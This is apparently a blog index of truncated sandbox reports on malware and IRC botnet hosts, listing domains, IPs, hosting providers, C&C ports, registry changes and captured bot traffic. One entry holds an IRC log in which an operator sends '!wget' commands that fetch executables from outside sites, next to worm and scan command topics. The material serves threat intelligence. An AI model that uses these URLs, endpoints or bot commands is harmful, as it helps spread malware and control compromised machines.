Category: Uncategorized

76f.no-ip.biz(malware hosted with

Uncategorized

DNS Lookup Host Name IP Address 76f.no-ip.biz 173.0.3.196 api.ipinfodb.com 67.212.74.82 Download URLs http://67.212.74.82/v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off (api.ipinfodb.com) Outgoing connection to remote server: 76f.no-ip.biz port 3333 Outgoing connection to remote server: api.ipinfodb.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareVB and VBA Program SettingsSrvIDID “UMUZZPIO31” = Spread HKEY_CURRENT_USERSoftwareVB and VBA Program SettingsINSTALLDATE “UMUZZPIO31” =Read more...

saud.markaz-royal.net(botnet hosted with Germany Hetzner Online Ag)

Uncategorized

– DNS Queries: Name Query Type Query Result Successful Protocol saud.markaz-royal.net DNS_TYPE_A 46.4.176.169 YES udp 46.4.176.169:7493 Nick: {N}|AUT|XP|pc5|971512 Username: betqyd Server Pass: (null) Joined Channel: #null# Private Message to Channel #null#: “New Servant.” infos about hosting: http://whois.domaintools.com/46.4.176.169

flash.quickupdates.net(botnet hosted with Germany Dolorem Ipsum)

Uncategorized

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.8.2 flash.quickupdates.net 46.4.232.76 www.whatismyip.com www.whatismyip.com 72.233.89.200 checkip.dyndns.org checkip.dyndns.org 91.198.22.70 Download URLs http://72.233.89.200/ (www.whatismyip.com) http://72.233.89.200/ (www.whatismyip.com) http://91.198.22.70/ (checkip.dyndns.org) http://91.198.22.70/ (checkip.dyndns.org) C&C Server: 46.4.232.76:5337 Server Password: Username: blaze Nickname: {iNF-00-DEU-XP-DELL-1855} Channel: #join (Password: error) Chanel: #irape Chanel: #b Channeltopic: :.aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -rRead more...

195.162.68.118(botnet hosted with Russian Federation Navitel Rusconnect Ltd)

Uncategorized

Remote Host Port Number 195.162.68.118 7777 PASS google_x1[s7_4]rk-h.tmp NICK {N}|USA|XP|COMPUTERNAME|192671 USER vsqcdz “” “lfjx” :COMPUTERNAME JOIN #nonamefase PRIVMSG #nonamefase :New Servant. Now talking in #nonamefase Modes On: [ #nonamefase ] [ +smntu ] (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !wget http://shoponline.muji.fr/images/sss.exe (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !!wget http://www.rummagu.com/burnbuddy.exe (niname) !!wget http://www.rummagu.com/burnbuddy.exe (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !msn Boot yourRead more...

videosalegria.com(malware hosted with Brazil Comite Gestor Da Internet No Brasil)

Uncategorized

DNS Lookup Host Name IP Address 0 127.0.0.1 videosalegria.com videosalegria.com 187.17.98.13 UDP Connections Remote IP Address: 127.0.0.1 Port: 1066 Send Datagram: 115 packet(s) of size 1 Recv Datagram: 115 packet(s) of size 1 Download URLs http://187.17.98.13/red.swf (videosalegria.com) Outgoing connection to remote server: videosalegria.com TCP port 80DNS Lookup Host Name IP Address 0 127.0.0.1 www.youtube.com www.youtube.comRead more...

crocusfeerst.com(malware hosted with Netherlands Amsterdam Yisp)

Uncategorized

DNS Lookup Host Name IP Address crocusfeerst.com crocusfeerst.com 109.235.48.186 Opened listening TCP connection on port: 21346 Outgoing connection to remote server: crocusfeerst.com TCP port 80 Outgoing connection to remote server: crocusfeerst.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftTihit “Ohyti” = [REG_BINARY, size: 116 bytes] HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerPhishingFilter “Enabled” = [REG_DWORD,Read more...